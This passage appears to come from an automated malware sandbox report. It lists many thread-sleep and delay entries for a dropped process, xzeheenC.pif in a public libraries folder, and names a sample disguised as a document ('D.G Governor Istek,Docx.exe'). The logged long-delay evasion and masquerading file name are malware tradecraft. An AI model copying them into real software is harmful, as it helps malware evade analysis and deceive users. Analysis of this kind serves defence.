          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -599547s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -599437s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -599328s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -599219s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -599094s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -598985s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -598870s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -598750s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -598641s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -598516s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -598406s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -598297s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -598188s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -598063s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -597938s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -597813s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -597703s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -597594s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -597469s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -597359s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -597250s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -597140s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -597024s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -596907s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -596782s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -596657s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -596547s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -596438s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -596313s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -596188s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -596063s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -595938s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -595828s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -595718s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -595609s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -595500s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -595391s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -595266s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -595157s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -595032s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -594907s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -594797s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -594688s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -594563s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -594438s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2824Thread sleep time: -594313s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -24903104499507879s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -599875s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4508Thread sleep count: 2401 > 30Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 4508Thread sleep count: 7433 > 30Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -599766s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -599656s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -599547s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -599438s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -599325s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -599203s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -599094s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -598984s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -598875s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -598765s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -598641s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -598516s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -598407s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -598296s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -598172s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -598061s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -597891s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -597767s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -597655s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -597539s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -597437s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -597328s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -597203s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -597094s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -596969s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -596860s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -596735s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -596625s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -596485s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -596375s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -596266s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -596156s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -596047s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -595938s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -595828s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -595715s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -595594s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -595484s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -595375s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -595266s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -595156s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -595033s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -594719s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -594532s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -594407s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -594282s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -594157s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -594032s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 2680Thread sleep time: -593922s >= -30000sJump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep count: 35 > 30
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -32281802128991695s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -600000s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 1812Thread sleep count: 6831 > 30
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -599875s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -599765s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -599656s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 1812Thread sleep count: 3013 > 30
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -599515s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -599405s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -599282s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -599000s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -598795s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -598686s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -598577s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -598453s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -598343s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -598234s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -598124s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -598015s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -597906s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -597796s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -597687s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -597578s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -597468s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -597359s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -597250s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -597140s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -597031s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -596921s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -596812s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -596703s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -596586s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -596484s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -596374s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -596265s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -596156s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -596046s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -595937s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -595827s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -595718s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -595609s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -595500s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -595390s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -595281s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -595171s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -595062s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -594953s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -594843s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -594734s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -594625s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -594515s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -594406s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -594296s >= -30000s
          Source: C:\Users\Public\Libraries\xzeheenC.pif TID: 576Thread sleep time: -594187s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\D.G Governor Istek,Docx.exeCode function: 0_2_029C58B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_029C58B4
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599875Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599766Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599656Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599547Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599437Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599328Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599219Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599094Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598985Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598870Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598750Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598641Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598516Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598406Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598297Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598188Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598063Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597938Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597813Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597703Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597594Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597469Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597359Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597250Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597140Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597024Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596907Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596782Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596657Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596547Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596438Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596313Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596188Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596063Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595938Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595828Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595718Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595609Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595500Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595391Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595266Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595157Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595032Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594907Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594797Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594688Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594563Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594438Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594313Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 600000Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599875Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599766Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599656Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599547Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599438Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599325Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599203Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599094Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598984Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598875Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598765Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598641Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598516Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598407Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598296Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598172Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598061Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597891Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597767Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597655Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597539Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597437Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597328Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597203Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597094Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596969Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596860Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596735Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596625Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596485Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596375Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596266Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596156Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596047Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595938Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595828Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595715Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595594Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595484Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595375Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595266Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595156Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595033Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594719Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594532Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594407Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594282Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594157Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594032Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 593922Jump to behavior
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 922337203685477
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 600000
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599875
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599765
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599656
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599515
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599405
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599282
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599000
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598795
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598686
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598577
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598453
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598343
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598234
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598124
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598015
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597906
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597796
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597687
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597578
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597468
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597359
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597250
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597140
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597031
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596921
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596812
          Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596703
